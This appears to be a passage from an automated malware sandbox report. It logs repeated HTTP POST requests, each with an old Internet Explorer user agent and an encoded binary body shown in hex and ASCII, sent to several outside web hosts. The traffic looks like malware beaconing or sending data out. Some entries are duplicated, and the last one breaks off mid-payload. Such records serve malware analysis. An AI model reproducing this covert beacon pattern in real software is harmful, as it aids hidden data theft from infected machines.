                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 61 6d 6f 54 62 67 6b 6f 6b 77 73 37 43 46 75 52 57 4a 47 38 58 53 4c 52 30 46 34 6e 39 70 54 66 54 62 75 30 50 32 4d 61 47 58 32 59 45 39 74 79 59 32 32 49 65 6b 33 4c 50 44 48 71 64 33 62 62 69 4c 64 4e 4c 56 33 54 39 62 7a 32 36 32 4c 4f 66 79 49 6c 50 64 54 2f 42 56 61 62 49 6a 70 47 35 41 79 44 37 45 32 7a 30 4e 6b 57 31 47 64 6b 43 51 6c 4a 39 54 62 59 42 61 6d 54 74 59 58 4a 62 6c 30 39 4f 63 58 30 6b 34 59 73 2b 75 36 74 6f 77 4a 4a 5a 38 49 53 41 35 4e 4b 66 57 5a 74 63 74 79 47 72 58 2f 54 69 53 37 30 59 73 61 42 62 66 7a 58 68 32 76 44 72 58 77 68 43 6a 39 43 64 48 65 35 49 36 38 44 42 37 75 74 32 39 6e 37 72 77 54 67 6f 39 68 49 4f 4c 38 42 55 78 6b 30 59 68 57 42 74 57 49 79 49 6e 2b 68 7a 53 65 41 47 55 5a 77 4f 53 37 48 5a 4d 5a 53 4f 73 41 70 49 67 50 47 70 53 6e 44 7a 4c 62 31 6a 47 4f 2b 78 74 52 57 51 43 4c 65 6b 5a 78 4e 2f 56 36 30 6e 6b 54 32 55 2b 48 2b 49 63 2f 70 73 68 34 44 61 70 32 69 49 77 37 63 4f 6a 37 56 31 73 64 55 44 44 7a 79 41 58 72 49 61 53 58 4f 74 76 61 61 46 56 43 7a 6e 52 41 41 44 45 44 7a 35 77 51 61 73 4c 5a 37 39 66 54 72 51 65 59 73 64 34 37 71 6e 42 62 41 78 37 32 2f 68 55 4c 51 41 46 32 53 44 2b 32 39 57 56 41 64 33 76 78 71 77 6b 74 50 76 4b 4b 59 62 5a 53 38 46 63 62 71 6e 49 43 6f 35 63 75 41 5a 63 71 35 54 2b 6d 70 6c 58 30 62 32 46 2b 35 41 35 65 6f 73 76 77 32 32 30 4c 78 46 4c 6b 39 71 74 79 58 76 51 33 77 6e 70 6c 6d 6c 37 68 30 36 52 39 4f 4d 41 75 6b 43 5a 33 65 4d 65 78 65 42 45 44 34 56 50 52 69 4d 52 36 51 77 78 37 2b 48 6e 77 76 31 31 76 47 32 48 79 6b 52 2f 51 4f 49 31 31 63 43 61 36 66 41 36 76 50 41 30 44 5a 37 56 56 34 39 30 59 62 59 4c 63 53 34 30 76 41 30 49 54 49 51 42 55 58 6d 50 61 45 68 37 2b 35 42 37 4f 4d 49 2b 59 54 50 65 51 41 33 7a 48 49 51 78 64 36 59 55 41 3d Data Ascii: amoTbgkokws7CFuRWJG8XSLR0F4n9pTfTbu0P2MaGX2YE9tyY22Iek3LPDHqd3bbiLdNLV3T9bz262LOfyIlPdT/BVabIjpG5AyD7E2z0NkW1GdkCQlJ9TbYBamTtYXJbl09OcX0k4Ys+u6towJJZ8ISA5NKfWZtctyGrX/TiS70YsaBbfzXh2vDrXwhCj9CdHe5I68DB7ut29n7rwTgo9hIOL8BUxk0YhWBtWIyIn+hzSeAGUZwOS7HZMZSOsApIgPGpSnDzLb1jGO+xtRWQCLekZxN/V60nkT2U+H+Ic/psh4Dap2iIw7cOj7V1sdUDDzyAXrIaSXOtvaaFVCznRAADEDz5wQasLZ79fTrQeYsd47qnBbAx72/hULQAF2SD+29WVAd3vxqwktPvKKYbZS8FcbqnICo5cuAZcq5T+mplX0b2F+5A5eosvw220LxFLk9qtyXvQ3wnplml7h06R9OMAukCZ3eMexeBED4VPRiMR6Qwx7+Hnwv11vG2HykR/QOI11cCa6fA6vPA0DZ7VV490YbYLcS40vA0ITIQBUXmPaEh7+5B7OMI+YTPeQA3zHIQxd6YUA=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stnic.co.ukCache-Control: no-cacheData Raw: 6a 49 4a 61 68 77 48 55 75 77 71 57 4b 4d 42 48 34 42 32 4b 55 74 70 37 74 31 52 2f 44 62 43 4b 78 65 6f 69 65 62 49 43 46 72 6f 43 69 70 44 32 30 68 2f 38 64 58 61 38 49 6f 4f 61 50 45 47 2f 38 37 48 64 6e 68 70 63 4f 4a 57 41 2b 67 6d 75 62 2f 4b 72 32 31 30 2f 67 2b 6e 6b 63 38 7a 65 4e 63 35 50 6c 56 77 45 6d 64 46 46 6c 42 36 59 68 4c 65 48 57 35 6b 53 73 78 64 68 46 70 79 4d 59 47 34 61 52 57 69 68 68 4e 65 47 68 44 61 67 2b 56 61 39 70 4d 38 62 74 72 69 70 6b 37 79 78 6f 56 30 72 6c 79 64 2b 75 69 30 2b 58 47 6d 4d 79 62 78 5a 78 78 2f 4e 56 4d 67 58 68 6f 69 74 57 50 37 79 70 73 65 30 4e 48 31 6a 56 51 39 72 61 57 59 46 30 32 6c 4e 72 36 35 6f 71 49 4d 61 34 55 68 36 6a 69 33 67 31 54 57 4b 32 63 74 5a 77 67 33 67 35 32 44 58 6d 75 56 65 45 49 4b 30 66 6e 54 66 64 66 71 61 68 38 75 41 5a 65 36 39 76 32 61 4a 5a 59 68 59 6f 62 38 78 79 54 42 75 58 62 37 4d 33 52 34 6c 39 55 37 31 62 4e 72 47 57 41 62 66 4f 7a 62 65 69 6e 36 65 77 76 53 62 38 74 35 38 49 48 44 44 50 6a 6e 32 64 6c 61 75 42 46 68 44 33 32 53 43 4b 49 44 48 6c 36 64 6d 59 75 32 72 59 34 4d 45 43 53 71 67 41 30 46 51 4f 6d 57 34 53 2f 72 36 39 6b 6a 38 58 32 4b 45 54 54 6d 45 71 6e 6e 5a 2b 62 63 79 54 73 61 35 48 61 74 51 59 55 2b 6a 77 7a 6f 6d 72 6c 67 2b 53 46 37 57 34 54 5a 66 38 41 7a 54 4d 64 4f 6d 56 7a 37 77 67 4b 4b 58 6a 5a 50 6a 6f 55 57 42 79 6f 4b 4f 2f 47 71 53 7a 52 34 58 31 78 68 2f 30 6c 7a 74 77 5a 37 61 37 77 2f 7a 30 41 42 4e 70 4b 6d 30 53 44 63 42 49 73 49 30 71 64 49 71 6d 44 43 71 47 6e 59 49 2b 45 5a 50 35 37 56 4b 31 48 51 47 45 6a 30 57 36 75 63 48 46 57 52 57 31 31 72 4a 54 54 7a 47 6e 69 37 56 65 6c 2b 58 4f 6c 76 46 59 72 68 31 5a 6a 75 75 46 51 4f 45 Data Ascii: jIJahwHUuwqWKMBH4B2KUtp7t1R/DbCKxeoiebICFroCipD20h/8dXa8IoOaPEG/87HdnhpcOJWA+gmub/Kr210/g+nkc8zeNc5PlVwEmdFFlB6YhLeHW5kSsxdhFpyMYG4aRWihhNeGhDag+Va9pM8btripk7yxoV0rlyd+ui0+XGmMybxZxx/NVMgXhoitWP7ypse0NH1jVQ9raWYF02lNr65oqIMa4Uh6ji3g1TWK2ctZwg3g52DXmuVeEIK0fnTfdfqah8uAZe69v2aJZYhYob8xyTBuXb7M3R4l9U71bNrGWAbfOzbein6ewvSb8t58IHDDPjn2dlauBFhD32SCKIDHl6dmYu2rY4MECSqgA0FQOmW4S/r69kj8X2KETTmEqnnZ+bcyTsa5HatQYU+jwzomrlg+SF7W4TZf8AzTMdOmVz7wgKKXjZPjoUWByoKO/GqSzR4X1xh/0lztwZ7a7w/z0ABNpKm0SDcBIsI0qdIqmDCqGnYI+EZP57VK1HQGEj0W6ucHFWRW11rJTTzGni7Vel+XOlvFYrh1ZjuuFQOE
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jacomfg.comCache-Control: no-cacheData Raw: 39 2f 4b 44 62 42 4d 62 6b 77 76 55 4e 50 46 55 32 75 57 4c 46 4c 7a 65 54 32 72 35 48 75 55 43 39 32 6d 30 62 55 68 6b 67 41 78 6b 5a 67 34 51 79 71 38 42 75 65 37 53 37 4f 6a 34 41 54 61 34 58 47 48 4f 69 56 64 45 76 50 36 64 4c 77 4e 5a 4b 56 77 79 6b 59 4a 42 7a 4a 47 63 73 47 4d 61 68 62 6c 7a 58 71 56 48 33 6b 64 38 68 70 6b 52 69 6b 42 4e 32 53 33 41 48 78 52 72 77 70 47 71 39 31 79 7a 52 79 64 33 57 35 36 36 75 59 4d 36 4e 43 31 4c 58 77 71 6f 70 59 56 2f 4e 49 7a 6f 4e 70 77 50 37 70 4b 59 65 34 47 6b 4a 53 32 6a 36 56 7a 35 77 59 48 77 53 6d 74 6d 65 4b 41 36 7a 6f 4f 72 4c 39 5a 30 70 79 78 79 33 65 6f 4d 4b 38 71 58 35 6b 2f 72 32 38 70 67 7a 44 4c 32 47 57 6b 70 6f 32 45 39 38 70 67 55 35 6c 6f 78 37 68 49 6b 5a 6a 76 72 44 77 2f 31 66 6c 77 69 32 2f 74 2f 6e 67 79 6a 43 74 73 41 2f 30 4e 74 44 6e 36 4e 70 4d 42 7a 71 61 2b 32 6f 78 49 54 64 66 4e 6a 78 49 76 6c 55 2f 73 4e 66 34 51 73 6f 7a 44 75 35 73 79 4b 36 51 4f 51 32 4a 72 47 61 54 4c 78 6c 71 74 62 61 79 2f 6a 48 32 45 48 4a 59 4d 6e 4a 47 4b 37 6f 78 30 52 77 64 41 62 76 42 47 59 34 47 62 44 45 39 6e 71 32 63 4b 7a 75 37 2b 38 72 4e 65 61 30 53 42 6b 30 30 70 4a 52 31 45 32 43 75 61 78 6c 42 6e 37 2b 48 37 77 30 54 37 2f 73 54 66 30 68 6d 33 76 50 42 36 77 45 4a 44 37 72 6c 42 2f 75 49 65 6f 6e 4d 35 71 62 44 4b 4f 77 35 6d 69 6d 59 47 58 39 57 32 7a 53 75 2b 4d 4b 36 4c 77 6f 66 61 4e 63 43 41 4d 73 38 37 63 36 77 4d 67 64 52 52 62 5a 4b 75 53 33 30 47 43 37 4d 74 42 50 36 46 70 33 7a 4c 49 5a 4a 68 38 6c 31 48 35 79 37 4b 4c 30 46 6e 43 70 56 6a 4c 6a 36 43 49 6d 76 73 53 6b 57 70 78 67 43 58 4d 4e 41 36 50 74 66 39 46 46 75 78 47 62 58 77 65 32 4c 6d 4d 2f 70 37 69 64 72 72 2f 78 2b 2b 55 75 61 71 63 Data Ascii: 9/KDbBMbkwvUNPFU2uWLFLzeT2r5HuUC92m0bUhkgAxkZg4Qyq8Bue7S7Oj4ATa4XGHOiVdEvP6dLwNZKVwykYJBzJGcsGMahblzXqVH3kd8hpkRikBN2S3AHxRrwpGq91yzRyd3W566uYM6NC1LXwqopYV/NIzoNpwP7pKYe4GkJS2j6Vz5wYHwSmtmeKA6zoOrL9Z0pyxy3eoMK8qX5k/r28pgzDL2GWkpo2E98pgU5lox7hIkZjvrDw/1flwi2/t/ngyjCtsA/0NtDn6NpMBzqa+2oxITdfNjxIvlU/sNf4QsozDu5syK6QOQ2JrGaTLxlqtbay/jH2EHJYMnJGK7ox0RwdAbvBGY4GbDE9nq2cKzu7+8rNea0SBk00pJR1E2CuaxlBn7+H7w0T7/sTf0hm3vPB6wEJD7rlB/uIeonM5qbDKOw5mimYGX9W2zSu+MK6LwofaNcCAMs87c6wMgdRRbZKuS30GC7MtBP6Fp3zLIZJh8l1H5y7KL0FnCpVjLj6CImvsSkWpxgCXMNA6Ptf9FFuxGbXwe2LmM/p7idrr/x++Uuaqc
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.yocinc.orgCache-Control: no-cacheData Raw: 71 48 34 43 68 70 51 4e 59 67 73 54 7a 79 53 46 62 35 74 47 4e 65 64 4e 54 45 77 4d 7a 70 70 52 43 44 53 33 4e 73 38 32 6b 51 61 75 51 6b 68 4a 43 61 73 55 57 68 57 4a 46 57 53 71 55 36 76 43 73 44 46 73 6b 58 31 7a 6a 62 37 4f 57 38 50 39 76 51 53 70 6f 36 72 46 74 33 48 33 43 6b 6f 4d 41 32 74 50 74 50 6a 76 72 72 48 2f 64 53 6b 71 44 37 4a 6a 6b 79 44 61 74 56 6e 58 45 32 44 5a 67 70 31 44 2f 67 30 6d 57 6a 64 32 58 63 55 49 73 49 47 39 52 68 68 72 57 44 36 2f 75 45 69 7a 68 53 31 42 62 58 59 66 45 67 39 53 30 44 36 33 44 36 65 77 71 34 31 7a 6f 71 48 2f 61 54 6d 41 57 49 4b 57 47 34 6e 4f 58 6c 42 68 63 43 2f 2f 4b 31 45 5a 38 5a 57 2f 4a 32 64 34 48 76 30 61 68 75 69 42 63 62 6d 4d 32 31 35 41 61 75 71 57 43 6a 7a 33 38 6c 53 6d 36 73 68 6f 67 5a 7a 54 31 63 6f 72 30 4b 30 2f 46 66 32 52 65 76 61 54 4a 70 31 65 4a 75 75 2b 53 44 6a 53 36 51 4b 6e 74 31 73 4f 39 36 43 52 4f 65 72 42 4a 59 30 33 37 43 6c 4c 78 59 4e 33 39 45 50 4b 78 68 2f 52 56 49 36 59 57 49 37 4c 6f 54 42 79 45 35 51 49 62 49 4d 66 79 43 6f 55 41 79 54 42 51 6c 5a 33 61 73 46 67 57 55 4b 64 69 58 5a 48 58 54 68 36 71 66 68 73 37 50 79 49 77 6d 74 2f 79 76 70 54 71 5a 41 65 46 4d 45 52 69 52 31 4d 30 34 7a 36 4f 59 4d 70 35 65 45 36 39 66 57 79 55 41 4f 55 59 74 4f 59 59 72 55 74 74 37 77 62 61 76 70 62 39 77 62 2b 47 66 49 79 52 35 50 4b 4d 69 39 52 70 4b 6d 79 54 66 4f 47 71 76 75 51 58 52 49 43 45 44 64 51 58 42 58 35 66 66 4f 41 62 55 73 73 76 4a 2b 54 67 6f 2f 77 39 75 77 53 68 43 55 32 77 66 75 41 63 67 4c 6c 68 31 66 75 70 74 37 54 35 78 69 67 50 54 7a 4e 74 72 53 6c 66 46 51 38 50 2f 66 77 45 48 50 58 59 61 5a 4d 4b 55 55 50 61 5a 53 58 6e 68 6c 51 35 39 6d 6e 73 61 6d 48 73 72 53 6c 32 6a 50 58 2f 63 6e 52 69 62 50 62 46 61 53 70 77 77 3d 3d Data Ascii: qH4ChpQNYgsTzySFb5tGNedNTEwMzppRCDS3Ns82kQauQkhJCasUWhWJFWSqU6vCsDFskX1zjb7OW8P9vQSpo6rFt3H3CkoMA2tPtPjvrrH/dSkqD7JjkyDatVnXE2DZgp1D/g0mWjd2XcUIsIG9RhhrWD6/uEizhS1BbXYfEg9S0D63D6ewq41zoqH/aTmAWIKWG4nOXlBhcC//K1EZ8ZW/J2d4Hv0ahuiBcbmM215AauqWCjz38lSm6shogZzT1cor0K0/Ff2RevaTJp1eJuu+SDjS6QKnt1sO96CROerBJY037ClLxYN39EPKxh/RVI6YWI7LoTByE5QIbIMfyCoUAyTBQlZ3asFgWUKdiXZHXTh6qfhs7PyIwmt/yvpTqZAeFMERiR1M04z6OYMp5eE69fWyUAOUYtOYYrUtt7wbavpb9wb+GfIyR5PKMi9RpKmyTfOGqvuQXRICEDdQXBX5ffOAbUssvJ+Tgo/w9uwShCU2wfuAcgLlh1fupt7T5xigPTzNtrSlfFQ8P/fwEHPXYaZMKUUPaZSXnhlQ59mnsamHsrSl2jPX/cnRibPbFaSpww==
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 588User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.kernsafe.comCache-Control: no-cacheData Raw: 61 6d 6f 54 62 67 6b 6f 6b 77 73 37 43 46 75 52 57 4a 47 38 58 53 4c 52 30 46 34 6e 39 70 54 66 54 62 75 30 50 32 4d 61 47 58 32 59 45 39 74 79 59 32 32 49 65 6b 33 4c 50 44 48 71 64 33 62 62 69 4c 64 4e 4c 56 33 54 39 62 7a 32 36 32 4c 4f 66 79 49 6c 50 64 54 2f 42 56 61 62 49 6a 70 47 35 41 79 44 37 45 32 7a 30 4e 6b 57 31 47 64 6b 43 51 6c 4a 39 54 62 59 42 61 6d 54 74 59 58 4a 62 6c 30 39 4f 63 58 30 6b 34 59 73 2b 75 36 74 6f 77 4a 4a 5a 38 49 53 41 35 4e 4b 66 57 5a 74 63 74 79 47 72 58 2f 54 69 53 37 30 59 73 61 42 62 66 7a 58 68 32 76 44 72 58 77 68 43 6a 39 43 64 48 65 35 49 36 38 44 42 37 75 74 32 39 6e 37 72 77 54 67 6f 39 68 49 4f 4c 38 42 55 78 6b 30 59 68 57 42 74 57 49 79 49 6e 2b 68 7a 53 65 41 47 55 5a 77 4f 53 37 48 5a 4d 5a 53 4f 73 41 70 49 67 50 47 70 53 6e 44 7a 4c 62 31 6a 47 4f 2b 78 74 52 57 51 43 4c 65 6b 5a 78 4e 2f 56 36 30 6e 6b 54 32 55 2b 48 2b 49 63 2f 70 73 68 34 44 61 70 32 69 49 77 37 63 4f 6a 37 56 31 73 64 55 44 44 7a 79 41 58 72 49 61 53 58 4f 74 76 61 61 46 56 43 7a 6e 52 41 41 44 45 44 7a 35 77 51 61 73 4c 5a 37 39 66 54 72 51 65 59 73 64 34 37 71 6e 42 62 41 78 37 32 2f 68 55 4c 51 41 46 32 53 44 2b 32 39 57 56 41 64 33 76 78 71 77 6b 74 50 76 4b 4b 59 62 5a 53 38 46 63 62 71 6e 49 43 6f 35 63 75 41 5a 63 71 35 54 2b 6d 70 6c 58 30 62 32 46 2b 35 41 35 65 6f 73 76 77 32 32 30 4c 78 46 4c 6b 39 71 74 79 58 76 51 33 77 6e 70 6c 6d 6c 37 68 30 36 52 39 4f 4d 41 75 6b 43 5a 33 65 4d 65 78 65 42 45 44 34 56 50 52 69 4d 52 36 51 77 78 37 2b 48 6e 77 76 31 31 76 47 32 48 79 6b 52 2f 51 4f 49 31 31 63 43 61 36 66 41 36 76 50 41 30 44 5a 37 56 56 34 39 30 59 62 59 4c 63 53 34 30 76 41 30 49 54 49 51 42 55 58 6d 50 61 45 68 37 2b 35 42 37 4f 4d 49 2b 59 54 50 65 51 41 33 7a 48 49 51 78 64 36 59 55 41 3d Data Ascii: amoTbgkokws7CFuRWJG8XSLR0F4n9pTfTbu0P2MaGX2YE9tyY22Iek3LPDHqd3bbiLdNLV3T9bz262LOfyIlPdT/BVabIjpG5AyD7E2z0NkW1GdkCQlJ9TbYBamTtYXJbl09OcX0k4Ys+u6towJJZ8ISA5NKfWZtctyGrX/TiS70YsaBbfzXh2vDrXwhCj9CdHe5I68DB7ut29n7rwTgo9hIOL8BUxk0YhWBtWIyIn+hzSeAGUZwOS7HZMZSOsApIgPGpSnDzLb1jGO+xtRWQCLekZxN/V60nkT2U+H+Ic/psh4Dap2iIw7cOj7V1sdUDDzyAXrIaSXOtvaaFVCznRAADEDz5wQasLZ79fTrQeYsd47qnBbAx72/hULQAF2SD+29WVAd3vxqwktPvKKYbZS8FcbqnICo5cuAZcq5T+mplX0b2F+5A5eosvw220LxFLk9qtyXvQ3wnplml7h06R9OMAukCZ3eMexeBED4VPRiMR6Qwx7+Hnwv11vG2HykR/QOI11cCa6fA6vPA0DZ7VV490YbYLcS40vA0ITIQBUXmPaEh7+5B7OMI+YTPeQA3zHIQxd6YUA=
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 576User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.snugpak.comCache-Control: no-cacheData Raw: 42 76 57 38 64 35 51 4a 76 51 76 39 51 53 4b 4b 62 32 64 4e 46 75 65 70 37 46 6f 4d 4f 6d 66 77 43 4f 69 6b 6e 33 7a 56 48 44 58 79 6a 55 65 62 33 5a 64 78 43 57 59 44 33 75 4d 37 6b 39 48 41 61 39 6d 79 4e 6d 50 32 6e 50 64 34 45 4e 68 52 77 63 57 4f 65 4d 48 50 77 2b 70 41 46 55 56 71 61 64 76 55 43 2b 6d 76 4e 56 6c 70 45 59 63 5a 50 47 5a 38 78 36 34 49 6f 75 49 70 77 55 48 4e 4c 76 73 4a 79 46 47 6c 74 4e 75 70 44 6f 66 48 43 51 59 53 54 42 47 43 4d 73 30 2f 6c 35 38 4d 61 44 39 6e 6c 49 70 63 74 77 6d 44 42 4a 43 53 50 6a 73 67 64 78 6b 6c 38 67 35 70 35 4a 76 48 77 4d 30 41 73 47 6f 44 4f 43 6e 49 69 6e 77 49 75 35 64 63 34 75 77 64 42 47 38 43 70 33 57 4d 36 71 6d 6f 52 35 6e 34 53 49 2f 6c 74 72 6d 6b 42 32 59 71 6d 6e 55 4a 57 37 67 37 61 45 54 4e 4c 52 37 70 62 61 63 58 6e 45 7a 42 70 50 4f 42 6d 5a 58 2b 32 36 79 72 71 37 77 2b 35 77 72 55 6d 39 35 37 69 4e 4c 54 37 47 65 31 70 4c 35 2b 57 69 69 69 55 54 36 56 4b 32 49 62 39 53 55 57 52 35 76 32 50 65 6c 69 6c 6d 64 33 36 69 77 64 66 4b 53 72 70 6e 41 66 44 4a 70 74 2b 4a 32 59 41 38 54 2f 43 42 4a 4c 4f 61 5a 50 70 37 30 48 79 6b 47 65 54 73 4a 71 70 79 45 32 69 66 31 78 41 62 6e 69 76 58 36 57 37 54 47 2f 2b 38 51 4d 73 7a 72 6c 66 53 6f 66 6a 45 32 70 65 57 57 71 77 6c 68 36 38 5a 50 4b 37 72 41 59 72 54 74 52 7a 33 51 35 48 5a 63 63 64 58 32 2b 38 54 37 4e 64 7a 62 76 74 42 4c 31 6e 67 44 5a 6a 6e 2b 34 57 75 72 6b 36 79 4b 4a 61 38 6d 4e 7a 54 55 36 72 52 55 47 6c 59 61 72 4f 52 61 54 34 44 6f 2f 38 57 55 6b 49 41 31 35 6e 37 79 54 2b 62 48 69 33 34 46 6e 2b 4d 65 32 52 79 2f 56 61 6f 56 63 42 6b 30 33 42 36 66 4c 55 38 34 68 4a 79 73 30 5a 6a 68 51 6c 66 67 4e 76 55 4e 58 48 32 30 4c 59 77 41 2b 51 30 4b 41 2f 71 53 42 62 57 79 45 Data Ascii: BvW8d5QJvQv9QSKKb2dNFuep7FoMOmfwCOikn3zVHDXyjUeb3ZdxCWYD3uM7k9HAa9myNmP2nPd4ENhRwcWOeMHPw+pAFUVqadvUC+mvNVlpEYcZPGZ8x64IouIpwUHNLvsJyFGltNupDofHCQYSTBGCMs0/l58MaD9nlIpctwmDBJCSPjsgdxkl8g5p5JvHwM0AsGoDOCnIinwIu5dc4uwdBG8Cp3WM6qmoR5n4SI/ltrmkB2YqmnUJW7g7aETNLR7pbacXnEzBpPOBmZX+26yrq7w+5wrUm957iNLT7Ge1pL5+WiiiUT6VK2Ib9SUWR5v2Pelilmd36iwdfKSrpnAfDJpt+J2YA8T/CBJLOaZPp70HykGeTsJqpyE2if1xAbnivX6W7TG/+8QMszrlfSofjE2peWWqwlh68ZPK7rAYrTtRz3Q5HZccdX2+8T7NdzbvtBL1ngDZjn+4Wurk6yKJa8mNzTU6rRUGlYarORaT4Do/8WUkIA15n7yT+bHi34Fn+Me2Ry/VaoVcBk03B6fLU84hJys0ZjhQlfgNvUNXH20LYwA+Q0KA/qSBbWyE
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.jacomfg.comCache-Control: no-cacheData Raw: 39 2f 4b 44 62 42 4d 62 6b 77 76 55 4e 50 46 55 32 75 57 4c 46 4c 7a 65 54 32 72 35 48 75 55 43 39 32 6d 30 62 55 68 6b 67 41 78 6b 5a 67 34 51 79 71 38 42 75 65 37 53 37 4f 6a 34 41 54 61 34 58 47 48 4f 69 56 64 45 76 50 36 64 4c 77 4e 5a 4b 56 77 79 6b 59 4a 42 7a 4a 47 63 73 47 4d 61 68 62 6c 7a 58 71 56 48 33 6b 64 38 68 70 6b 52 69 6b 42 4e 32 53 33 41 48 78 52 72 77 70 47 71 39 31 79 7a 52 79 64 33 57 35 36 36 75 59 4d 36 4e 43 31 4c 58 77 71 6f 70 59 56 2f 4e 49 7a 6f 4e 70 77 50 37 70 4b 59 65 34 47 6b 4a 53 32 6a 36 56 7a 35 77 59 48 77 53 6d 74 6d 65 4b 41 36 7a 6f 4f 72 4c 39 5a 30 70 79 78 79 33 65 6f 4d 4b 38 71 58 35 6b 2f 72 32 38 70 67 7a 44 4c 32 47 57 6b 70 6f 32 45 39 38 70 67 55 35 6c 6f 78 37 68 49 6b 5a 6a 76 72 44 77 2f 31 66 6c 77 69 32 2f 74 2f 6e 67 79 6a 43 74 73 41 2f 30 4e 74 44 6e 36 4e 70 4d 42 7a 71 61 2b 32 6f 78 49 54 64 66 4e 6a 78 49 76 6c 55 2f 73 4e 66 34 51 73 6f 7a 44 75 35 73 79 4b 36 51 4f 51 32 4a 72 47 61 54 4c 78 6c 71 74 62 61 79 2f 6a 48 32 45 48 4a 59 4d 6e 4a 47 4b 37 6f 78 30 52 77 64 41 62 76 42 47 59 34 47 62 44 45 39 6e 71 32 63 4b 7a 75 37 2b 38 72 4e 65 61 30 53 42 6b 30 30 70 4a 52 31 45 32 43 75 61 78 6c 42 6e 37 2b 48 37 77 30 54 37 2f 73 54 66 30 68 6d 33 76 50 42 36 77 45 4a 44 37 72 6c 42 2f 75 49 65 6f 6e 4d 35 71 62 44 4b 4f 77 35 6d 69 6d 59 47 58 39 57 32 7a 53 75 2b 4d 4b 36 4c 77 6f 66 61 4e 63 43 41 4d 73 38 37 63 36 77 4d 67 64 52 52 62 5a 4b 75 53 33 30 47 43 37 4d 74 42 50 36 46 70 33 7a 4c 49 5a 4a 68 38 6c 31 48 35 79 37 4b 4c 30 46 6e 43 70 56 6a 4c 6a 36 43 49 6d 76 73 53 6b 57 70 78 67 43 58 4d 4e 41 36 50 74 66 39 46 46 75 78 47 62 58 77 65 32 4c 6d 4d 2f 70 37 69 64 72 72 2f 78 2b 2b 55 75 61 71 63 Data Ascii: 9/KDbBMbkwvUNPFU2uWLFLzeT2r5HuUC92m0bUhkgAxkZg4Qyq8Bue7S7Oj4ATa4XGHOiVdEvP6dLwNZKVwykYJBzJGcsGMahblzXqVH3kd8hpkRikBN2S3AHxRrwpGq91yzRyd3W566uYM6NC1LXwqopYV/NIzoNpwP7pKYe4GkJS2j6Vz5wYHwSmtmeKA6zoOrL9Z0pyxy3eoMK8qX5k/r28pgzDL2GWkpo2E98pgU5lox7hIkZjvrDw/1flwi2/t/ngyjCtsA/0NtDn6NpMBzqa+2oxITdfNjxIvlU/sNf4QsozDu5syK6QOQ2JrGaTLxlqtbay/jH2EHJYMnJGK7ox0RwdAbvBGY4GbDE9nq2cKzu7+8rNea0SBk00pJR1E2CuaxlBn7+H7w0T7/sTf0hm3vPB6wEJD7rlB/uIeonM5qbDKOw5mimYGX9W2zSu+MK6LwofaNcCAMs87c6wMgdRRbZKuS30GC7MtBP6Fp3zLIZJh8l1H5y7KL0FnCpVjLj6CImvsSkWpxgCXMNA6Ptf9FFuxGbXwe2LmM/p7idrr/x++Uuaqc
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 584User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.yocinc.orgCache-Control: no-cacheData Raw: 71 48 34 43 68 70 51 4e 59 67 73 54 7a 79 53 46 62 35 74 47 4e 65 64 4e 54 45 77 4d 7a 70 70 52 43 44 53 33 4e 73 38 32 6b 51 61 75 51 6b 68 4a 43 61 73 55 57 68 57 4a 46 57 53 71 55 36 76 43 73 44 46 73 6b 58 31 7a 6a 62 37 4f 57 38 50 39 76 51 53 70 6f 36 72 46 74 33 48 33 43 6b 6f 4d 41 32 74 50 74 50 6a 76 72 72 48 2f 64 53 6b 71 44 37 4a 6a 6b 79 44 61 74 56 6e 58 45 32 44 5a 67 70 31 44 2f 67 30 6d 57 6a 64 32 58 63 55 49 73 49 47 39 52 68 68 72 57 44 36 2f 75 45 69 7a 68 53 31 42 62 58 59 66 45 67 39 53 30 44 36 33 44 36 65 77 71 34 31 7a 6f 71 48 2f 61 54 6d 41 57 49 4b 57 47 34 6e 4f 58 6c 42 68 63 43 2f 2f 4b 31 45 5a 38 5a 57 2f 4a 32 64 34 48 76 30 61 68 75 69 42 63 62 6d 4d 32 31 35 41 61 75 71 57 43 6a 7a 33 38 6c 53 6d 36 73 68 6f 67 5a 7a 54 31 63 6f 72 30 4b 30 2f 46 66 32 52 65 76 61 54 4a 70 31 65 4a 75 75 2b 53 44 6a 53 36 51 4b 6e 74 31 73 4f 39 36 43 52 4f 65 72 42 4a 59 30 33 37 43 6c 4c 78 59 4e 33 39 45 50 4b 78 68 2f 52 56 49 36 59 57 49 37 4c 6f 54 42 79 45 35 51 49 62 49 4d 66 79 43 6f 55 41 79 54 42 51 6c 5a 33 61 73 46 67 57 55 4b 64 69 58 5a 48 58 54 68 36 71 66 68 73 37 50 79 49 77 6d 74 2f 79 76 70 54 71 5a 41 65 46 4d 45 52 69 52 31 4d 30 34 7a 36 4f 59 4d 70 35 65 45 36 39 66 57 79 55 41 4f 55 59 74 4f 59 59 72 55 74 74 37 77 62 61 76 70 62 39 77 62 2b 47 66 